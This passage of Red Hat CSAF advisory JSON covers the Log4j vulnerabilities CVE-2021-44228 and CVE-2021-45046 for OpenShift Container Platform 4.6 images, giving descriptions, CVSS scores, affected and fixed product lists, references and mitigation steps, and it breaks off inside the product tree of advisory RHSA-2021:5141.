"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le",
"8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64"
],
"known_not_affected": [
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-16T06:12:27+00:00",
"details": "For OpenShift Container Platform 4.6 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html",
"product_ids": [
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le",
"8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5106"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
},
{
"cve": "CVE-2021-45046",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-12-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2032580"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. \nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le",
"8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64"
],
"known_not_affected": [
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-45046"
},
{
"category": "external",
"summary": "RHBZ#2032580",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45046"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2021-44228",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4",
"url": "https://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-16T06:12:27+00:00",
"details": "For OpenShift Container Platform 4.6 see the following documentation, which\nwill be updated shortly for this release, for important instructions on how\nto upgrade your cluster and fully apply this asynchronous errata update:\n\nhttps://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-release-notes.html\n\nDetails on how to access this content are available at\nhttps://docs.openshift.com/container-platform/4.6/updating/updating-cluster-cli.html",
"product_ids": [
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le",
"8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5106"
},
{
"category": "workaround",
"details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).",
"product_ids": [
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator-bundle@sha256:b0b6c17769c6ec87496d14b2bcfbfbd035782671bbf6e6934dc2f240f1033902_amd64",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:8db02b3087c2c89bafaf6896d67462af54e77ba3c2fb299a84ab7886f1b92ce1_amd64",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:d0916cd9a19901ff6c8b24f0f27db9e9f9322f8fc6eb9e773c4b43fe98800416_s390x",
"8Base-RHOSE-4.6:openshift4/ose-elasticsearch-operator@sha256:dfd7356ce68d9ff2498655c07b7d700872185597c0c2855d6721acb2ae5e6b5c_ppc64le",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:416510e6e489dfb1ab1f0b2091015dcb0adac637ed37f1e18d30f128c45b93d2_s390x",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:8b0d423982c960d81f8e1ade8482ba064507863283aec360ac63f31f0ffdb24f_amd64",
"8Base-RHOSE-4.6:openshift4/ose-logging-elasticsearch6@sha256:ebc6a802dc110dddaae352c3a142fbeae1169d5c35fc0f77ef7e64b810c863af_ppc64le",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator-bundle@sha256:7c67b7bcdc6e35f38905aff84f007a2b77c727836f256a0c038934ab62c7011e_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-ansible-operator@sha256:fc3a7d606162c571647e0a4f6184091eddc1fe360e93d7692d1195559a7a74db_amd64",
"8Base-RHOSE-4.6:openshift4/ose-metering-hive@sha256:2a8670a968b37e04539c052b399e539d60a006bdf4e46d5066bc04530da8f532_amd64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2023-05-01T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)"
}
]
}
rhsa-2021_5141
Vulnerability from csaf_redhat
Published
2021-12-16 07:50
Modified
2024-12-12 01:19
Summary
Red Hat Security Advisory: OpenShift Container Platform 4.6.52 security update
Notes
Topic
Red Hat OpenShift Container Platform release 4.6.52 is now available with
updates to packages and images that fix several bugs and add enhancements.
Red Hat Product Security has rated this update as having a security impact
of Critical. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available for each vulnerability from
the CVE link(s) in the References section.
Details
Red Hat OpenShift Container Platform is Red Hat's cloud computing
Kubernetes application platform solution designed for on-premise or private
cloud deployments.
Security Fix(es):
* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)
* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)
* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Critical"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Red Hat OpenShift Container Platform release 4.6.52 is now available with\nupdates to packages and images that fix several bugs and add enhancements.\n\nRed Hat Product Security has rated this update as having a security impact\nof Critical. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "Red Hat OpenShift Container Platform is Red Hat\u0027s cloud computing\nKubernetes application platform solution designed for on-premise or private\ncloud deployments.\n\nSecurity Fix(es):\n\n* log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value (CVE-2021-44228)\n* log4j: Remote code execution in Log4j 1.x when application is configured to use JMSAppender (CVE-2021-4104)\n* log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228) (CVE-2021-45046)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2021:5141",
"url": "https://access.redhat.com/errata/RHSA-2021:5141"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#critical",
"url": "https://access.redhat.com/security/updates/classification/#critical"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "2031667",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2031667"
},
{
"category": "external",
"summary": "2032580",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2021/rhsa-2021_5141.json"
}
],
"title": "Red Hat Security Advisory: OpenShift Container Platform 4.6.52 security update",
"tracking": {
"current_release_date": "2024-12-12T01:19:16+00:00",
"generator": {
"date": "2024-12-12T01:19:16+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.2.3"
}
},
"id": "RHSA-2021:5141",
"initial_release_date": "2021-12-16T07:50:00+00:00",
"revision_history": [
{
"date": "2021-12-16T07:50:00+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2021-12-16T07:50:00+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2024-12-12T01:19:16+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat OpenShift Container Platform 4.6",
"product": {
"name": "Red Hat OpenShift Container Platform 4.6",
"product_id": "8Base-RHOSE-4.6",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:4.6::el8"
}
}
}
],
"category": "product_family",
"name": "Red Hat OpenShift Enterprise"
},
{
"branches": [
{
"category": "product_version",
"name": "openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64",
"product": {
"name": "openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64",
"product_id": "openshift4/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-hadoop@sha256:56a77578d021635534efcca828d6f0cccf241c257f09dfe09a0954d59706f563?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-hadoop\u0026tag=v4.6.0-202112150545.p0.gf381145.assembly.art3595"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64",
"product": {
"name": "openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64",
"product_id": "openshift4/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-ansible-operator@sha256:099361536ce805ecc59390e83b66c4e08ff3fb1c38c2dc0f56b4d001dce79fd7?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator\u0026tag=v4.6.0-202112150545.p0.gd74112d.assembly.art3595"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64",
"product": {
"name": "openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64",
"product_id": "openshift4/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6_amd64",
"product_identification_helper": {
"purl": "pkg:oci/ose-metering-ansible-operator-bundle@sha256:94a4644b5a65b551cf7d790676887e51e8aec01be60659b262f629f692f361c6?arch=amd64\u0026repository_url=registry.redhat.io/openshift4/ose-metering-ansible-operator-bundle\u0026tag=v4.6.0.202112150545.p0.gd74112d.assembly.art3595-1"
}
}
},
{
"category": "product_version",
"name": "openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64",
"product": {
"name": "openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64",
"product_id": "openshift4/ose-metering-presto@sha256:614005401fe4df9fdcad9f3b38e612cf023b79c013db3bed5aa7822d9d5e55ab_amd64",
"product_identification_helper": {
